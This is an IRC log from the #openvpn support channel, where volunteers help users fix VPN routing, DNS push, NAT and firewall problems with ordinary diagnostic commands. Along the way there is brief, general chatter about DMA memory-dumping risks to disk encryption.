11.4.2 Arch: 64 Bit 11:38 <@krzee> mine has an expresscard slot 11:44 <@plaisthos> yeah, full disc encryption is compromised by these extensions 11:44 <@plaisthos> since you get dma capabilties and read the full memory of the notebook 11:45 <@plaisthos> (if the notebook is on of course) 11:45 <@plaisthos> this btw. is the reason why xbox 360 processor has embedded ram on the cpu die to keep the keys from going into main memory 11:46 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 11:47 < chrisb> plaisthos: good details 11:49 <@plaisthos> never underestimate your attackers :) 11:50 <@plaisthos> last time I check (about 3 years ago) you could dump a macbooks memory with firewire 11:50 <@plaisthos> and firewire is cheap and freebsd even has a dev/firewire mem device to make this easy for you .... 12:12 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 260 seconds] 12:12 <@ecrist> kisom: screen lock doesn't do anything with disk encryption 12:14 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 12:15 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn 12:22 -!- miha [~miha@unaffiliated/miha] has joined #openvpn 12:23 < miha> trying to configure windows openvpn client. i use vpn as gateway, think i need to set dns too 12:23 < miha> i'm pretty sure server pushes dns, but windows client so far ignores it? 12:24 <@dazo> miha: nope ... windows clients does not ignore it ... make sure you use --push "dhcp-option $DNS_IP" in your server config 12:25 -!- st0_ [~lenov@125.163.239.88] has joined #openvpn 12:25 < miha> i have it without -- ? 12:26 < miha> push "dhcp-option DNS 193.xxx...." 12:27 < miha> works on ubuntu client 12:27 < Cpt-Oblivious> plaisthos, we're changing the server side subnet from 192.168.1.0/24 to 192.168.0.0/24 now. 12:27 <+pekster> miha: You should see that DNS server under the TAP-Win32 adapter if you do 'ipconfig /all' in a prompt 12:27 < Cpt-Oblivious> Had to wait for my friend to come online. Server is hosted at his home network since he has 100/100 mbps fiber. 12:30 < miha> pekster: you're right. dns is there. default gateway isnt 12:30 -!- ExxKA [ExxKA@nat/google/x-yeotbtxjhaaupbng] has quit [Quit: This computer has gone to sleep] 12:31 -!- st0_ [~lenov@125.163.239.88] has quit [Quit: st0_] 12:31 < miha> what is command to use vpn as gateway?? 12:32 < miha> i googled forum posts 12:32 -!- Mimiko [~Mimiko@89.28.88.177] has quit [] 12:33 < miha> redirect-gateway ? 12:34 -!- st0 [~Lenovo@125.163.239.88] has joined #openvpn 12:35 -!- dazo is now known as dazo_afk 12:37 -!- st0 [~Lenovo@125.163.239.88] has quit [Client Quit] 12:39 -!- st0 [~Lenovo@125.163.239.88] has joined #openvpn 12:42 -!- bauruine_ [~stefan@91.236.116.112] has quit [Remote host closed the connection] 12:44 -!- F^4 [~FFForever@unaffiliated/ffforever] has left #openvpn [] 12:59 -!- miha [~miha@unaffiliated/miha] has left #openvpn [] 13:00 -!- M4rc3l [~marc@unaffiliated/m4rc3l] has quit [Quit: bye] 13:01 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 13:09 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 13:18 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 13:21 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Quit: Ex-Chat] 13:22 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Client Quit] 13:34 -!- st0 [~Lenovo@125.163.239.88] has left #openvpn ["Leaving"] 13:43 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Quit: Don't flap your BGP at me sonny] 13:56 < Cpt-Oblivious> Miha, it is indeed the redirect-gateway one. 14:00 < Cpt-Oblivious> Hmm.... All pc's in my subnet can ping all VPN clients. 14:00 < Cpt-Oblivious> But the VPN clients can only ping the OpenVPN server, what setting am I missing? 14:01 <+pekster> Cpt-Oblivious: What is it you want? Clients to reach other clients, or the LAN? and is the LAN behind the VPN server or a client? 14:02 <@ecrist> !goal 14:02 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 14:03 < Cpt-Oblivious> At the moment i I got a 192.168.0.x LAN, in which the OpenVPN server is situated. Clients connect from a 192.168.1.x LAN. They get assigned an ip address out of the 10.248.12.x pool. 192.168.0.146 / 10.248.12.1 is the OpenVPN server. Right now, all clients can connect and can ping both ip addresses of the OpenVPN server. They can how ever not ping any other 192.168.0.x ip address. All other 14:03 < Cpt-Oblivious> servers in the 192.168.0.x subnet can ping every 10.248.12.x client though. 14:04 < Cpt-Oblivious> I've got IP forwarding enabled on the OpenVPN server. So that can't be it. 14:05 <+pekster> Sounds like a firewall issue to me, unless you're performing SNAT on traffic bound for the VPN network 14:05 < Cpt-Oblivious> A firewall issue on the OpenVPN server then I guess? 14:06 < Cpt-Oblivious> All clients from 192.168.0.x just talk to their gateway, 192.168.0.1 and that gateway tells them that they can find 10.248.12.x people at 192.168.0.146 (the open vpn server). And that works beautifully. 14:06 -!- MeanderingCode [~Meanderin@71-213-184-243.albq.qwest.net] has joined #openvpn 14:06 < Cpt-Oblivious> The communication in the other way isn't working though. The vpn clients try to talk to 192.168.0.x pc's. But the OpenVPN server isn't forwarding those requests to the router. 14:06 < Cpt-Oblivious> It only answers when asked on it's own 192.168.0.146 address. 14:08 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Read error: Connection reset by peer] 14:09 <+pekster> So: are you using NAT? 14:09 < Cpt-Oblivious> Not that i'm aware of. 14:09 <+pekster> Clearly routing is working fine since the reply from the VPN clients makes it back to the server-side LAN systems 14:09 < Cpt-Oblivious> The OpenVPN server should just forward all 192.168.0.x requests to the router / gateway and then all will be fine. 14:09 <+pekster> So, you're left with a firewall 14:09 <+pekster> What OS? 14:09 < Cpt-Oblivious> Ubuntu 12.04 14:10 <+pekster> Can you pastebin the output of 'iptables-save' ? 14:10 < Cpt-Oblivious> ofc, sec 14:11 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 14:11 < Cpt-Oblivious> that outputs nothing 14:11 < Cpt-Oblivious> I can show you what iptables--list outputs though? 14:12 <+pekster> If you have any firewall rules, 'iptables-save' dumps them in the most usable format for diagnostic purposes. How does it show you "nothing" ? 14:12 < Cpt-Oblivious> I did that in the command line and it doesn't output anything 14:12 < Cpt-Oblivious> it just executes it 14:12 < Cpt-Oblivious> or do i have to go to some file where the rules get saved into? 14:13 -!- Guest31276 [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 14:13 < Cpt-Oblivious> www.pastebin.com/ZzqEEEyC 14:13 <+pekster> As root? '/sbin/iptables-save' should never output nothing unless you don't have iptables support in your kernel :\ 14:13 <+pekster> Ah, okay, so you literally have no filtering, got it 14:13 < Cpt-Oblivious> ah, i didn't run it as root 14:13 < Cpt-Oblivious> now i get output 14:14 < Cpt-Oblivious> www.pastebin.com/j0tHFwjG 14:14 <+pekster> Well, the output you just gave works too (iptables-save is just easier to read than any 'iptables' output, but your rules are fully empty and accept all traffic.) 14:15 <+pekster> So, I'm left wondering if the clients themselves are the ones dropping the traffic. If you can ping from a LAN client on 192.168.0/24 to a VPN client on 10.248.12/24, you know routing and firewalls are permissive of that traffic 14:15 < Cpt-Oblivious> yea 14:15 < Cpt-Oblivious> that works 14:15 <+pekster> Try a tcpdump on the VPN server's LAN iface as you ping from VPN client to server. You should see an echo-request go out to the client LAN IP, then an echo-reply come back 14:16 <+pekster> My guess is you only see the request, not the reply. The solution there is to fix the LAN client's firewall to allow the request 14:16 < Cpt-Oblivious> So I start a ping -t towards any of the 192.168.0.x clients except for the server since that one works 14:16 < Cpt-Oblivious> and then do a TCP dump? 14:16 <+pekster> Erm, ping from the client to the LAN system, I mean 14:16 < Cpt-Oblivious> yea 14:16 < Cpt-Oblivious> that's that 14:17 < Cpt-Oblivious> the clients got 192.168.1.x natively. And get a 10.248.12.x assigned. So i ping from 10.248.12.x towards any of the 192.168.0.x computers on the server side. Except for 192.168.0.146 since that is the OpenVPN server and that works. 14:18 <+pekster> That's the issue you started with, right? So you're still not getting replies? What does the tcpdump show you? 14:18 < Cpt-Oblivious> ooh 14:18 < Cpt-Oblivious> I have an idea 14:19 <+pekster> Assuming eth0 is your LAN iface on the server, 'tcpdump -pnvi eth0 icmp' will show you want you want 14:19 < Cpt-Oblivious> Shouldn't I have something in my client config which tells my client that if i want to talk to 192.168.0.x people that i have to forward everything to 10.248.12.1 / 192.168.0.146 (the open VPN server) 14:19 < Cpt-Oblivious> shouldn't there be a static route like 192.168.0.0/24 to 10.248.12.1 or something? 14:20 <+pekster> You must already have that if your LAN network client's can ping 10.248.12/24 directly 14:20 <+pekster> Yes, there should. Unless you've mis-stated your problem in your original description, you already have that 14:20 < Cpt-Oblivious> I don't have that :P 14:20 < Cpt-Oblivious> and it works :P 14:21 < Cpt-Oblivious> The only thing i did is add a router on my gateway on the server side. Which tells all 192.168.0.x computers that if they want to chat to a 10.248.12.x vpn client, that they have to go to the 192.168.0.146 ip of the server. 14:21 < Cpt-Oblivious> I physically added that on the router. 14:21 <+pekster> Okay, then you made a mistake when you said "All other servers in the 192.168.0.x subnet can ping every 10.248.12.x client though." 14:21 < Cpt-Oblivious> No they can. 14:21 < Cpt-Oblivious> Any 192.168.0.x server can ping any client in 10.248.12.x, they'll get replies. 14:21 < Cpt-Oblivious> the other way around just doesn't work. 14:21 <+pekster> Then you have that return route already 14:22 <+pekster> It's not a routing problem. It's a firewall problem 14:22 < Cpt-Oblivious> let me shut down the firewalls on both machines 14:22 < Cpt-Oblivious> sec 14:22 < Cpt-Oblivious> ooh it's off already :p 14:22 <+pekster> Look at it this way: the reply goes from the 10.248.12/24 network to the 192.168.0/24 network. Since you get the reply that follows that path, you can infer you have the required route already 14:23 < Cpt-Oblivious> Yea 14:23 < Cpt-Oblivious> they can reply 14:23 < Cpt-Oblivious> they just can't figure out where to start talking on their own. 14:23 <+pekster> This means routing is fine 14:23 <+pekster> So, that tcpdump? 14:23 <+pekster> What did you learn from it? 14:23 < Cpt-Oblivious> yes, let me do that. 1 sec. 14:24 < Cpt-Oblivious> but 14:24 < Cpt-Oblivious> i got the vpn as udp configured 14:24 < Cpt-Oblivious> should i make it an udp dump? 14:25 <+pekster> No. We don't care about the encrypted traffic 14:25 <+pekster> You care about pings 14:25 < Cpt-Oblivious> ok 14:25 <+pekster> So, dump icmp traffic on your LAN, just as I asked 14:26 < Cpt-Oblivious> doing that dump now 14:26 < Cpt-Oblivious> www.pastebin.com/A3hFEabS 14:28 <+pekster> Requests go out, and no replies come back. Your problem is your LAN system's firewall on 192.168.0.141 14:28 < Cpt-Oblivious> those icmp's / pings all time out. I'm trying to ping 192.168.0.141 from 10.248.12.6. 14:28 < Cpt-Oblivious> other way around works though 14:28 < Cpt-Oblivious> 192.168.0.141 is a windows server 2008r2 with the firewall disabled. 14:28 <+pekster> Apparently not 14:29 < Cpt-Oblivious> well.. it is :p 14:29 < Cpt-Oblivious> domain / private / public, all off. 14:29 <+pekster> Maybe the firewall on the LAN's default gw? 14:29 <+pekster> Somewhere a firewall is dropping the reply traffic 14:30 < Cpt-Oblivious> yea 14:30 < Cpt-Oblivious> Can i do a TCP dump on a windows server 2008r2 in command prompt or powershell? 14:30 < Cpt-Oblivious> so i can see if that one is dropping it? 14:30 <+pekster> You can install Wireshark 14:30 < Cpt-Oblivious> damn it :P 14:30 < Cpt-Oblivious> already feared that was the answer :P 14:30 < Cpt-Oblivious> ok on it. 14:31 <+pekster> That'll tell you if the 192.168.0.141 IP is even replying. If it is, then the only other system in the way is the LAN's gw system (which presumably has a firewall of its own) 14:31 <+pekster> Even if it has the route (which again, we know since traffic works the other way) it still needs to allow it 14:31 < Cpt-Oblivious> installing wireshark portable atm 14:32 < Cpt-Oblivious> done 14:33 < Cpt-Oblivious> let's see 14:33 < Cpt-Oblivious> nope 14:33 < Cpt-Oblivious> never reaches the win 2008r2 server 14:33 < Cpt-Oblivious> nothing of 10.248.12.6 in the entire capture 14:34 < Cpt-Oblivious> nothing of the openvpn server either 14:34 <+pekster> Dumping on it's LAN interface 14:34 <+pekster> ? 14:34 < Cpt-Oblivious> hmm 14:35 < Cpt-Oblivious> that filter isn't working as i thought it would 14:35 < Cpt-Oblivious> running capture again 14:35 <+pekster> Just do 'icmp' as your capture filter 14:35 <+pekster> (same as for tcpdump_ 14:35 <+pekster> And make sure the correct interface is used 14:35 < Cpt-Oblivious> ah 14:35 < Cpt-Oblivious> I see 2 packets 14:36 < Cpt-Oblivious> 10.248.12.6 as source 14:36 < Cpt-Oblivious> destination 192.168.0.141 14:36 < Cpt-Oblivious> ping request 14:36 < Cpt-Oblivious> icmp 14:36 < Cpt-Oblivious> about 5 seconds in between, about the time between icmp time outs 14:36 <@plaisthos> no ping reply? 14:37 <+pekster> If you don't see any reply traffic, then your local system is not generating any replies 14:37 <+pekster> That 192.168.0.141 system isn't also on the VPN network, is it? 14:37 <+pekster> (that would screw things up) 14:37 < Cpt-Oblivious> nope it isn't. 14:37 <+pekster> Then it's a local firewall ;) 14:37 < Cpt-Oblivious> that 192.168.0.146 is the OpenVPN server. 192.168.0.141 is the file server. 14:38 < Cpt-Oblivious> ooh 14:38 < Cpt-Oblivious> i see ping replies as well 14:38 < Cpt-Oblivious> source: 192.168.0.141 to 10.248.12.6 14:38 <+pekster> Then repeat the same procedure on the LAN's gateway, because that reply is never making it to the VPN server 14:38 < Cpt-Oblivious> eccho (ping) reply 14:39 <@plaisthos> Cpt-Oblivious: look at the mac addresses of icmp request and icmp reply 14:39 <@plaisthos> they should be the same in reverse order 14:39 <+pekster> plaisthos: Not in this case, because the VPN server is attached to the LAN but not the LAN's default gw 14:39 <@plaisthos> pekster: oh okay 14:40 <@plaisthos> so the lan default gw has a route going back to the vpn server? 14:40 <+pekster> Yup. Pings work the other way around 14:40 < Cpt-Oblivious> the ping reply is like instantly generated 14:40 <@plaisthos> nevermind then 14:40 <+pekster> So now it looks like the LAN gw is the firewall having problems 14:40 < Cpt-Oblivious> time of ping request: 1.45023600 14:40 <+pekster> Cpt-Oblivious: Check/fix your firewall on the gateway of your LAN 14:40 < Cpt-Oblivious> time of ping reply: 1.4503500 14:41 < Cpt-Oblivious> Hmmm 14:41 <@krzee> can be verified by bypassing the gw for a lan machine 14:41 < Cpt-Oblivious> how would i do that? 14:41 <@krzee> if it works then, then its for sure the gw's fault 14:41 <@krzee> its explained in: 14:41 <@krzee> !route 14:41 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 14:41 <@krzee> under ROUTES OUTSIDE OPENVPN 14:42 <+pekster> Add a route on 192.168.0.141 that routes 10.248.12/24 via 192.168.0.146 14:42 <@krzee> "the annoying work-around would be to add the route to every box on the LAN, in which case step 3 above would work." 14:42 <@krzee> ya that ^ 14:42 < Cpt-Oblivious> I got that pekster 14:42 <+pekster> (that's really a hack, but it'll identify the LAN gw as your problem without a doubt) 14:42 <@krzee> exactly 14:42 <+pekster> Unless you like manual routes on an entire subnet :P 14:42 <+pekster> More interns! 14:43 <@krzee> hahah 14:43 < Cpt-Oblivious> on my router / gateway I got a '10.248.12.0 with 255.255.255.0 to 192.168.0.146' static route. 14:43 <+pekster> Fix your *firewall*. Not routing ;) 14:43 <@krzee> right, if you add that to a host machine on the lan it will bypass the gw, and if that works we know 100% you need to fix your gw 14:43 < Cpt-Oblivious> ah 14:43 < Cpt-Oblivious> i understand what you're getting at 14:44 -!- brute11k [~brute11k@89.249.235.177] has quit [Quit: Leaving.] 14:44 < Cpt-Oblivious> netstat something was that 14:44 < Cpt-Oblivious> let me google it 14:44 <@krzee> google what!? 14:44 <@plaisthos> pekster: or crazy setup like sending unsolicated icmp redirects 14:44 < Cpt-Oblivious> how to add a static route again via netstat to a win2008r2 server 14:44 <+pekster> the 'route.exe' command will add routes 14:44 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 14:44 <+pekster> 'route /?' should give you usage syntax 14:44 < Cpt-Oblivious> ah 14:44 < Cpt-Oblivious> yea i see 14:44 <@krzee> route add 10.248.12.0 mask 255.255.255.0 192.168.0.146 14:44 <+pekster> plaisthos: I didn't know people still accepted redirects :P 14:44 <@plaisthos> krzee: you know: irc is just a google frontend with more insults 14:45 <@krzee> lol 14:45 < Cpt-Oblivious> done 14:45 <+pekster> And sometimes really bad advise (wait, google does that too!) 14:45 <@krzee> but we predate google! 14:45 < Cpt-Oblivious> ZOMG 14:45 < Cpt-Oblivious> it works 14:45 < Cpt-Oblivious> fuck you firewall on router 14:45 <@krzee> there, no go fix your router :D 14:45 <+pekster> Why don't you fix it then? 14:45 <@krzee> now* 14:45 <@plaisthos> pekster: i think most modern OSes still accept them 14:45 < Cpt-Oblivious> Damn Asus RT-N66U 14:46 <@plaisthos> pekster: there is no local lan security anyway :) 14:46 <@plaisthos> (icmp redirects from their default gw that is) 14:46 <+pekster> M&M security baby! (do it in an Austin Powers voice for best results) 14:46 < Cpt-Oblivious> hmmm 14:46 < Cpt-Oblivious> maybe that static route on the router 14:46 < Cpt-Oblivious> should that be added on the WAN port? 14:46 < Cpt-Oblivious> instead of the LAN port 14:46 <@krzee> pekster, most can be dns poisoned as well 14:46 < Cpt-Oblivious> could that be it? 14:47 <+pekster> Sure. TLS or die 14:47 < Cpt-Oblivious> or on the 'MAN' port w/e the hell that is 14:47 <+pekster> Cpt-Oblivious: YOu probably have a 'firewall' tab somewhere 14:47 < Cpt-Oblivious> yea i do 14:47 < Cpt-Oblivious> it's all turned off 14:47 <@krzee> is it running linux? 14:47 < Cpt-Oblivious> it's an Asus RT-N66U 14:47 < Cpt-Oblivious> just a web interface 14:47 <@krzee> ya i dunno 14:48 < Cpt-Oblivious> Firewall, no, DoS protection, no, Respond to ping requests from WAN, yes. Url filter, off, keyword filter, off. Network services filter, off. 14:48 < Cpt-Oblivious> that's about all the firewall stuff i got. 14:48 <+pekster> You should be able to download a manual online that'll tell you how to add a firewall rule 14:48 < Cpt-Oblivious> i know where to add firewall rules 14:48 < Cpt-Oblivious> but the firewall on that thing is completely off 14:48 <@krzee> probably gotta specifically allow something 14:48 < Cpt-Oblivious> what kind of rule would you suggest i add? 14:48 <+pekster> You need something to the effect of '-A FORWARD -s 192.168.0.0/24 -d 10.248.12.0/24 -i $lan_if -o $lan_if' in iptables-save syntax 14:49 <@krzee> it says off, but if it was off it would not do NAT 14:49 <+pekster> However you do that in your WebUI, that's for you to figure out 14:49 <@krzee> so its obviously on, but your optional additions are off 14:49 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 14:49 <@krzee> pekster, that would have failed on my dd-wrt, it has a rule at the end already blocking stuff, i had to use -I 14:50 <+pekster> iptables-save does not know '-I' 14:50 <@krzee> ahh 14:51 < Cpt-Oblivious> no idea why that router is being a dick 14:51 -!- Guest31276 [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Quit: Don't flap your BGP at me sonny] 14:51 <+pekster> And that, is why I run my own OS on my routers 14:51 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 14:51 < Cpt-Oblivious> 'Disable GRO(Generic Recieve Offload)' should that be off? 14:51 <+pekster> "If you want it done right..." 14:52 <+pekster> Nope. You have a basic firewall problem. It's not even NAT because the packets never even make it to the VPN server which is responsible for the network 14:52 < Cpt-Oblivious> I agree pekster 14:52 <@plaisthos> Guest15284: interesting reverse lookup ... 14:52 < Cpt-Oblivious> when i'm getting my 500/500 mbps fiber connection vs the 100/100 mbps one now. I'm building my own PFsense box. 14:53 < Cpt-Oblivious> Would any of you guys want to have a quicklook on my gateway via Teamviewer? 14:53 < Cpt-Oblivious> maybe i'm missing something trivial 14:54 <@plaisthos> Cpt-Oblivious: probably not 14:54 <@plaisthos> your use case was not consider by the guy designing this thing 14:54 < Cpt-Oblivious> it's a 130 euro router :P 14:55 < Cpt-Oblivious> it just shouldn't block a damn thing :p 14:55 < Cpt-Oblivious> and route :p 14:56 <@plaisthos> that router can handle a 100 Mbit connection? 14:56 < Cpt-Oblivious> yea 14:56 < Cpt-Oblivious> can handle about 800 mbit of WAN traffic 14:56 < Cpt-Oblivious> it's a pretty beafy router 14:56 <@plaisthos> astonishing 14:56 < Cpt-Oblivious> we bought it like 2 months ago 14:56 < Cpt-Oblivious> because the old one crapped out around 150 mbps 14:59 <@plaisthos> You should have hired a profssional consultant. Then you probably now had a Cisco ASA for at least ten times the price :) 14:59 < Cpt-Oblivious> lol :P 14:59 < Cpt-Oblivious> I'm a 20 year old student 14:59 < Cpt-Oblivious> this is a home network :P 14:59 < Cpt-Oblivious> I study Computer Science :P 15:00 <@plaisthos> or a CISCO ASR ;) 15:00 < Cpt-Oblivious> nah :P 15:00 < Cpt-Oblivious> I don't mind building my own Pfsense box 15:00 < Cpt-Oblivious> so i can play around with snort and stuff like that 15:00 < Cpt-Oblivious> when i get the 500/500 mbps fiber 15:00 < Cpt-Oblivious> but i'm not gonna spend a fuck load of money on cisco stuff 15:00 <@plaisthos> where you from that you are able to afford a 500/500 fiber? 15:01 < Cpt-Oblivious> The Netherlands 15:01 < Cpt-Oblivious> 500/500 mbps fiber, un metered. Downloading is legal. Costs 65 usd / month 15:01 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 240 seconds] 15:03 <@plaisthos> Cpt-Oblivious: I can get 16/1 MBit DSL for 20 EUR but I cannot get anything faster :/ 15:03 < Cpt-Oblivious> sucks :S 15:03 < Cpt-Oblivious> I got 50/3 mbps for something like that right now 15:04 < Cpt-Oblivious> my friend has 100/100 mbps fiber for 30-35 euro or so 15:04 < Cpt-Oblivious> and i might be moving into an appartment soon which has 500/500 for 50 euro or so 15:04 <+hazardous> nerds 15:04 <+hazardous> (also xs4all owns) 15:05 < Cpt-Oblivious> lol 15:05 < Cpt-Oblivious> no thnx :P 15:05 < Cpt-Oblivious> though xs4all fiber ain't bad 15:05 < Cpt-Oblivious> any fiber is good :P 15:06 -!- lsa [~la@pdpc/supporter/active/lsa] has joined #openvpn 15:08 < lsa> I have an OpenVPN server using UDP. Multiple clients are attempts to connect from a single IP address. There are issues getting connected/staying connected. Should this be expected with this situation? UDP + multiple clients from same NATed IP. 15:12 <@plaisthos> broken nat gw 15:12 <@plaisthos> probably 15:12 <@plaisthos> are you using nobind? 15:13 <@plaisthos> if not try again with nobind in client configs 15:19 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Quit: Don't flap your BGP at me sonny] 15:24 < lsa> plaisthos: I'll try that, thank you. 15:24 < lsa> plaisthos: Just add "nobind" to a new line in the config file, right? 15:28 -!- Guest78377 [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 15:28 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 15:34 -!- Guest78377 [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Changing host] 15:34 -!- Guest78377 [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 15:35 -!- Guest78377 [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Quit: Don't flap your BGP at me sonny] 15:35 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 15:35 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Changing host] 15:35 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 15:49 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 15:50 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Remote host closed the connection] 16:02 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds] 16:09 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 16:14 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 16:14 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 16:18 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 16:42 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 264 seconds] 16:50 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 16:55 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 16:57 <@plaisthos> lsa: yes 17:09 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has joined #openvpn 17:17 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has joined #openvpn 17:17 < Azrael_-> hi 17:22 < lsa> plaisthos: it worked. thanks a lot. 17:22 < lsa> have a good weekend 17:22 -!- lsa [~la@pdpc/supporter/active/lsa] has quit [Quit: leaving] 18:03 -!- medum [kevin@2607:f2f8:a4c4::2] has joined #openvpn 18:04 < medum> hi all. how would i go about making openvpn fail open? 18:06 <+rob0> and that means ... ? 18:10 <@krzee> medum, try your translation app again =] 18:11 < medum> meaning openvpn connection dies, internet is cutoff completely. rather than reconnecting without using the vpn at all 18:11 <@krzee> !def1 18:11 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 18:11 <@krzee> dont use def1 18:12 <@krzee> def1 makes it so you stay connected without the vpn, without it openvpn does what you desire 18:14 < medum> i'm not using def1 now and it doesn't look like it's used by default either 18:17 <@krzee> then you have no route to the internet without your vpn 18:17 <@krzee> ify ou are using redirect-gateway 18:18 < medum> i just tried adding redirect-gateway without def1 to my config. but pkill openvpn still sends traffic without the vpn 18:20 <@krzee> show me your routing table while openvpn is running, and after you stop it 18:23 < medum> default 192.168.1.1 wlan0 is there in the before and after 18:24 < medum> guess it has to be 18:27 < medum> http://pastebin.com/NTKfhuzK 18:31 <+rob0> that sure looks like def1 to me 18:31 < medum> redirect-gateway is in my config 18:39 <@krzee> !configs 18:39 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 18:39 <@krzee> both 19:04 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 252 seconds] 19:05 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 19:09 -!- videl_ is now known as videl 19:17 -!- Devastator- [~devas@177.18.199.7] has joined #openvpn 19:18 -!- raidz is now known as raidz_away 19:19 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 276 seconds] 19:20 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 19:31 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:31 -!- mode/#openvpn [+o krzee] by ChanServ 19:44 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 265 seconds] 19:46 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 19:46 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 19:47 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 252 seconds] 19:47 -!- Denial- is now known as Denial 20:04 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Remote host closed the connection] 20:04 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 20:15 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 20:15 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 20:15 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Client Quit] 20:24 <+hazardous> yo 20:32 -!- Devastator- [~devas@177.18.199.7] has quit [Changing host] 20:32 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 20:34 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn 20:40 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 256 seconds] 20:41 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 20:48 -!- Devastator- is now known as Devastator 20:48 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 246 seconds] 21:01 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Remote host closed the connection] 21:03 -!- MagisterQuis 